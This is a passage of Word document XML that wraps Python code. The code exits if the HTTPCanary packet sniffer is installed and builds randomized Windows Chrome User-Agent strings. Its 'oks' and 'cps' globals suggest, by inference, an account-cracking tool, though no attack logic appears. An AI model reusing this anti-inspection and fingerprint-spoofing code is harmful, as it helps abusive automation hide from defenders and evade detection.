    <w:p w14:paraId="6FFC6A32" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>self.fuck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41830097" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        # Check for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>HTTPCanary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (a packet sniffing app)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BA876E" w14:textId="53283F8F" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        if os.path.exists(‘/storage/emulated/0/x8zs/app_icon/com.guoshi.httpcanary.png’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EA7A59" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>self.fuck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35649E0C" w14:textId="3490B846" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        if os.path.exists(‘/storage/emulated/0/Android/data/com.guoshi.httpcanary’):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700FF38B" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>self.fuck</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFF1CC0" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFEB1F8" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>def</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> fuck(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44FE1DC2" w14:textId="27F5CF1E" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C86AD3" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        Terminates the script if tampering is detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB70835" w14:textId="2E31D9EC" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC28DC6" w14:textId="6D2EBF0A" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        print(‘ \x1b[1;32m Congratulations ! ‘)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C5F1CC" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>self.linex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D9E52C" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        exit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A397618" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79743787" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎   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linex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A833AD0" w14:textId="740EDD96" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        print(‘\x1b[38;5;48m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177438AC" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60AEE2BE" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303D7F12" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎# Global variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4240AC88" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎method = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4627B2D3" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎oks = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C04252F" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎cps = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461388CA" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎loop = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76738BDD" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎user = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C99F5C" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F372D9" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎# Color codes for terminal output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5489D449" w14:textId="5FF5E962" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎X = ‘\x1b[1;37m’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A1CC1C" w14:textId="33261FC1" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎rad = ‘\x1b[38;5;196m’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482034F9" w14:textId="1EB581D8" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎G = ‘\x1b[38;5;46m’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169D1664" w14:textId="6CF2DE08" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎Y = ‘\x1b[38;5;220m’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2370BD51" w14:textId="18C48A3B" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎PP = ‘\x1b[38;5;203m’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371B8EBD" w14:textId="22CC7390" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎RR = ‘\x1b[38;5;196m’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373FB8FC" w14:textId="28C499AD" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎GS = ‘\x1b[38;5;40m’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A86A99" w14:textId="4A16B023" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎W = ‘\x1b[1;37m’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320E3B43" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67043E59" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D8C156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windows():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7DD464" w14:textId="40B95645" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C49B321" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    Generates a random Windows User-Agent string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1269D8AD" w14:textId="47D8AAB6" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AA169B" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aV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(range(10, 20)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7531DCCC" w14:textId="489020C7" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    A = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f”Mozilla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/5.0 (Windows; U; Windows NT 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 xml:space="preserve">(range(5, 7)))}.1; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-US) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/534.{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>} (KHTML, like Gecko) Chrome/{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(range(8, 12)))}.0.{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(range(552, 661)))}.0 Safari/534.{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F06990" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bV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(range(1, 36)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660E6418" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bx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(range(34, 38)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5122E20E" w14:textId="44D1B66C" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = f’5{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}.{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42471E29" w14:textId="34A3AF24" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    B = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f”Mozilla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/5.0 (Windows NT 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(range(5, 7)))}.{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 xml:space="preserve">([‘2’, ‘1’]))}) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>} (KHTML, like Gecko) Chrome/{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(range(12, 42)))}.0.{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(range(742, 2200)))}.{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(range(1, 120)))} Safari/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5CD406" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    cV = 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(range(1, 36)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3ECECF" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    cx = 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(range(34, 38)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D90B2DD" w14:textId="6C1D788B" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = f’5{cx}.{cV}’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132AB60F" w14:textId="2C7064BD" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    C = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f”Mozilla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/5.0 (Windows NT 6.{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 xml:space="preserve">([‘2’, ‘1’]))}; WOW64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>} (KHTML, like Gecko) Chrome/{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(range(12, 42)))}.0.{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(range(742, 2200)))}.{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(range(1, 120)))} Safari/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689714E5" w14:textId="7795AA1D" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    D = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f”Mozilla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/5.0 (Windows NT 10.0; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/537.36 (KHTML, like Gecko) Chrome/121.0.{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(range(1, 7120)))}.0 Safari/537.36”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07097EEB" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>([A, B, C, D])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1256BC2A" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247D52FA" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E511BD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window1():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE68675" w14:textId="1E8A6A70" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C107A7" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    Generates another variant of a random Windows User-Agent string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024F60A5" w14:textId="67B89674" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3B5EA7" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aV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(range(10, 20)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AAF5CE" w14:textId="2E12B8D7" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    A = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f”Mozilla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/5.0 (Windows; U; Windows NT {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(range(6, 11))}.0; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">-US) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/534.{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>} (KHTML, like Gecko) Chrome/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(range(80, 122))}.0.{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(range(4000, 7000))}.0 Safari/534.{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A48EBE" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bV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(range(1, 36)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B04DDA0" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bx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(range(34, 38)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B70B5C" w14:textId="78AF7FE6" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = f’5{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}.{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3B7FCC" w14:textId="54CDE2DE" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    B = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f”Mozilla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/5.0 (Windows NT {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(range(6, 11))}.{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">([‘0’, ‘1’])}) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>} (KHTML, like Gecko) Chrome/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(range(80, 122))}.0.{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(range(4000, 7000))}.{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(range(50, 200))} Safari/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA27181" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    cV = 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(range(1, 36)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E924C7" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    cx = 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(range(34, 38)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7334A1A2" w14:textId="77FB793F" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = f’5{cx}.{cV}’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4529BEA9" w14:textId="35583F4B" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    C = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f”Mozilla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/5.0 (Windows NT 6.{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">([‘0’, ‘1’, ‘2’])}; WOW64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>} (KHTML, like Gecko) Chrome/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(range(80, 122))}.0.{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(range(4000, 7000))}.{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(range(50, 200))} Safari/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D842824" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>latest_build</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(6000, 9000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0204E99D" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>latest_patch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(100, 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1182DB2B" w14:textId="4929F7E4" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    D = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>f”Mozilla</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/5.0 (Windows NT {</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">([’10.0’, ’11.0’])}; Win64; x64) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AppleWebKit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/537.36 (KHTML, like Gecko) Chrome/139.0.{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>latest_build</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}.{</w:t>
      </w:r>
